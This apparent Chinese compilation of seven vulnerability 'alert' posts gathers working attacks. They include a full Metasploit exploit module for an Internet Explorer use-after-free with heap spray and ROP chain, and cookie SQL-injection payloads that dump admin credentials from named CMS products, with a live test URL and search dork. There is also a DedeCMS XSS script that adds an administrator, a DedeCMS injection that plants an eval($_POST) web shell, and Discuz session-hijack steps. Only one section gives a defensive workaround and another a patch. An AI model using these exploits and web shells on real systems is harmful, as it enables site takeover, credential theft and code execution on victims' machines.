下面小编为大家带来高危漏洞CVE0027 EXP,影响IE所有版本漏洞预警,本文共7篇,希望能帮助大家!
篇1:高危漏洞CVE0027 EXP,影响IE所有版本漏洞预警
Microsoft Internet Explorer处理CPasteComma存在一个释放后使用错误,允许构建恶意WEB页,诱使用户解析,可以应用程序上下文执行任意代码,CVE编号CVE-2013-0027,影响版本如下:
Microsoft Internet Explorer 10
Microsoft Internet Explorer 9
Microsoft Internet Explorer 8
Microsoft Internet Explorer 7
Microsoft Internet Explorer 6 在Metasploit已经发布相应的利用脚本,如下:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
'Name' =>“MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free”,
'Description' =>%q{
This module exploits a use-after-free vulnerability in Microsoft Internet Explorer
where a CParaElement node is released but a reference is still kept
in CDoc. This memory is reused when a CDoc relayout is performed.
},
'License' =>MSF_LICENSE,
'Author' =>
[
'Scott Bell
],
'References' =>
[
[ 'CVE', '2013-0025' ],
[ 'MSB', 'MS13-009' ],
[ 'URL', 'security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ]
],
'Payload' =>
{
'BadChars' =>“\\x00”,
'Space' =>920,
'DisableNops' =>true,
'PrependEncoder' =>“\\x81\\xc4\\x54\\xf2\\xff\\xff” # Stack adjustment # add esp, -3500
},
'DefaultOptions' =>
{
'InitialAutoRunScript' =>'migrate -f'
},
'Platform' =>'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' =>:msvcrt, 'Offset' =>0x5f4 } ]
],
'Privileged' =>false,
'DisclosureDate' =>“Feb 13 2013”,
'DefaultTarget' =>0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript. obfuscation', false])
], self.class)
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''
ie_name = “IE #{ie}”
case nt
when '5.1'
os_name = 'Windows XP SP3'
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
print_status(“Target selected as: #{t.name}”)
return t
end
end
return nil
end
def heap_spray(my_target, p)
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
js_nops = Rex::Text.to_unescape(“\\x0c”*4, Rex::Arch.endian(target.arch))
js = %Q|
var heap_obj = new heapLib.ie(0x0);
var code = unescape(“#{js_code}”);
var nops = unescape(“#{js_nops}”);
while (nops.length < 0x80000) nops += nops;
var ffset = nops.substring(0, #{my_target['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc;
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
var verflow = nops.substring(0, 10);
|
js = heaplib(js, {:noobfu =>true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
return js
end
def get_payload(t, cli)
code = payload.encoded
# No rop. Just return the payload.
return code if t['Rop'].nil?
# ROP chain generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status(“Using msvcrt ROP”)
rop_nops = [0x77c39f92].pack(“V”) * 11 # RETN
rop_payload = generate_rop_payload('msvcrt', “”, {'target'=>'xp'})
rop_payload << rop_nops
rop_payload << [0x77c364d5].pack(“V”) # POP EBP # RETN
rop_payload << [0x77c15ed5].pack(“V”) # XCHG EAX, ESP # RETN
rop_payload << [0x77c35459].pack(“V”) # PUSH ESP # RETN
rop_payload << [0x77c39f92].pack(“V”) # RETN
rop_payload << [0x0c0c0c8c].pack(“V”) # Shellcode offset
rop_payload << code
end
return rop_payload
end
def get_exploit(my_target, cli)
p = get_payload(my_target, cli)
js = heap_spray(my_target, p)
html = %Q|
|
return html
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
uri = request.uri
print_status(“Requesting: #{uri}”)
my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error(“Browser not supported, sending 404: #{agent}”)
send_not_found(cli)
return
end
html = get_exploit(my_target, cli)
html = html.gsub(/^\\t\\t/, '')
print_status “Sending HTML...”
send_response(cli, html, {'Content-Type'=>'text/html'})
end
endpastebin.com/raw.php?i=wKztJfTS
微软安全补丁: technet.microsoft.com/en-us/security/bulletin/ms13-009
篇2:简单文章管理系统 cookie注入漏洞通杀所有版本漏洞预警
简单文章管理系统采用一级分类,界面简洁,功能简单实用,删除文章后,文章相关图片也一并删除减
少垃圾文件的存在。
后台管理入口域名/admin 用户名和密码都是admin
后台模块:
信息管理: 发布信息 修改信息 查找信息 推荐信息
系统管理: 类别管理 用户管理 系统设置 数据库维护
漏洞文件:article.asp Check_SqlIn.asp 代码我就不作分析了。网上多的是,差不多的问题。
漏洞说明:过滤不严,导致可cookie注入。
好像有两个字段14和12。
exp:
javascript.:alert(document.cookie=“id=”+escape(“119 union select 1,2,3,user,5,6,password,8,9,10,11,12,13,14 from admin”));
javascript.:alert(document.cookie=“id=”+escape(“235 union select 1,2,3,user,5,password,7,8,9,10,11,12 from admin”));
利用方法我就不说了,网上很多,整天JJYY还是这点破事,
有图有真像:
拿shell方法:
暂时没有更好的办法,但是如果他的数据库是.asp .asa后缀的话,可在
www.xxx.com/data/!%article%!.asp
改变下成:www.xxx.com/data/%21%25article%25%21.asp
没对数据库访问进行处理。 ING~~~~~~~
用户管理--->增加管理员中 帐户写上一句话变型马。然后菜刀之类的连就可以了。
dork:
inurl:list.asp?classid=1 首页 上一页 下一页 尾页 页次:页 共 条记录 条记录/页 转到:
注意后面的字哦。。。^_^
From: www.0855.tv
By: Mr.DzY
篇3:启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警
by Mr.DzY
from www.0855.tv
由于网上开源的东西多了,版权就无从查起,这天姑且就这么称乎它吧。
具体版权无从查知,相似的内核太多。
源码下载:www.mycodes.net/25/4628.htm
:www.tb11.net/
官方演示:www.tb11.net/system/xitong/
www.tb11.net/system/xitong2/
www.tb11.net/system/xitong3/
直接上exploit:
javascript.:alert(document.cookie=“id=”+escape(“1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin”));
test:www.tb11.net/system/xitong/shownews.asp?id=210
测试关键字自己找,
篇4:IE 0day漏洞的消息:所有版本的IE都受影响
编外:用ie6的不用庆幸了(包括我)
tombkeeper的和谐Blog
微软更新了对这个漏洞的公告:
December 11, : Revised to include Microsoft Internet Explorer 5.01 Service Pack 4, Internet Explorer 6 Service Pack 1, Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 as potentially vulnerable software. Also added more workarounds.
也就是说,IE5、IE6、IE7、IE8全部都受这个漏洞的影响,而不是我们原先认为的只有IE7受影响,所以,我推荐所有IE用户下载安装www.xfocus.net/tk/tkBHO.zip。相关说明见:hi.baidu.com/tombkeeper/blog/item/d48412e9f9d07b38b90e2d09.html。
另外,请大家注意并转告那些仍然存在误解的朋友:微软目前尚未提供该漏洞的补丁,安装刚刚发布的12月安全更新并不能消除该漏洞。
补充:感谢匿名网友的留言提醒。经过测试确认,阻拦对oledb32.dll的访问的确可以对该漏洞起到临时防护的作用。请在命令提示符中按照下面演示的样子输入命令完成设置:
C:\\命令提示符
Microsoft Windows [版本5.2.3790]
(C)版权所有1985- Microsoft Corp.
C:\\> cacls “%CommonProgramFiles%\\System\\Ole DB\\oledb32.dll” /E /P Everyone:N
处理的文件: C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll
C:\\>
注意,阻拦对oledb32.dll的访问可能导致IE访问某些网站不正常,还可能对其他一些软件造成影响,
如果希望恢复对oledb32.dll的访问,可以用下面这条命令:
C:\\命令提示符
Microsoft Windows [版本5.2.3790]
(C)版权所有1985-2003 Microsoft Corp.
C:\\> cacls “%CommonProgramFiles%\\System\\Ole DB\\oledb32.dll” /E /R Everyone
处理的文件: C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll
C:\\>
篇5:DEDECMS xss 0day 通杀所有版本漏洞预警
漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行,可getshell
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
下面说说利用方法。
条件有2个:
1.开启注册
2.开启投稿
注册会员—-发表文章
内容填写:
新建xss.css,内容:
body{
background-image:url(´javascript.:document.write(“”)´)
}
新建xss.js文件,内容:
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest;
if(request.overrideMimeType) {
request.overrideMimeType(´text/xml´);
}
} else if(window.ActiveXObject) {
var versions = [´Microsoft.XMLHTTP´, ´MSXML.XMLHTTP´, ´Microsoft.XMLHTTP´, ´Msxml2.XMLHTTP.7.0´,´Msxml2.XMLHTTP.6.0´,´Msxml2.XMLHTTP.5.0´, ´Msxml2.XMLHTTP.4.0´, ´MSXML2.XMLHTTP.3.0´, ´MSXML2.XMLHTTP´];
for(var i=0; i try { request = new ActiveXObject(versions[i]); } catch(e) {} } } xmlhttp=request; function getFolder( url ){ bj = url.split(´/´) return obj[obj.length-2] } Url = top.location.href; u = getFolder(oUrl); add_admin(); function add_admin(){ var url= “/”+u+“/sys_sql_query.php”; var params =“fmdo=edit&backurl=&activepath=/data&filename=haris.php&str=
篇6:DISCUZ所有版本COOKIE劫持方法+DEMO漏洞预警
DISCUZ和很多论坛都无法进行会话劫持,因为会话和IP绑定了,DISCUZ主要的会话认证机制如下:
/inlude/common.inc.php
//第136行 验证会话重要的一段就是从sessions表中查询SID,其中一个重要的条件就是$onlineip,如果$onlineip和sessions表中的IP信息无法对应,就不能继续建立sessions表中保存的会话,
――――――――――――――――――――――――――C
代码:
if($sid) {
if($discuz_uid) {
$query = $db->query(”SELECT s.sid, s.styleid, s.groupid='6' AS ipbanned, s.pageviews AS spageviews, s.lastolupdate, s.seccode, $membertablefields
FROM {$tablepre}sessions s, {$tablepre}members m
WHERE m.uid=s.uid AND s.sid='$sid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' AND m.uid='$discuz_uid'
AND m.password='$discuz_pw' AND m.secques='$discuz_secques'“);
//79行 $onlineip首先取自HTTP_CLIENT_IP和HTTP_X_FORWARDED_FOR这两个HTTP头
------------------------------------------------------------------------------
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$onlineip = getenv('REMOTE_ADDR');
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], ‘unknown’)) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}
所以如果我们伪造HTTP_CLIENT_IP和HTTP_X_FORWARDED_FOR这两个HTTP头就可以绕过IP绑定,
篇7:dedecms注入漏洞 影响版本5.3 C 5.5Posted in php漏洞预警
摘自: 笔记
dedecms5.3和5.5系列版本存在重大注入漏洞,请注意以下操作有攻击性,仅供研究,利用此漏洞进行违法活动者,后果自负。
假设域名是:www.abc.com攻击步骤如下:
1. 访问网址:
www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
可看见以下错误信息
注入成功
2. 访问 www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. 执行附件地址:dede.rar里的文件 test.html,注意 form. 中 action 的地址是
按确定后的看到第2步骤的信息表示文件木马上传成功,
木马网址:www.abc.com/data/a.php
密码:2006888
漏洞分析:
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
解决方案:
打开文件 include/dedesql.class.php
找到代码
@fwrite($fp, ‘<’.'?php’.”\\r\\n/*\\r\\n{$savemsg}\\r\\n*/\\r\\n?”.”>\\r\\n”);
替换代码
@fwrite($fp, ‘<’.'?php’.”\\r\\nexit;\\r\\n/*\\r\\n{$savemsg}\\r\\n*/\\r\\n?”.”>\\r\\n”);
清空 data/mysql_error_trace.php 文件内容
★iShowMusic V1.2 写入shell漏洞漏洞预警
★启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警
文档为doc格式
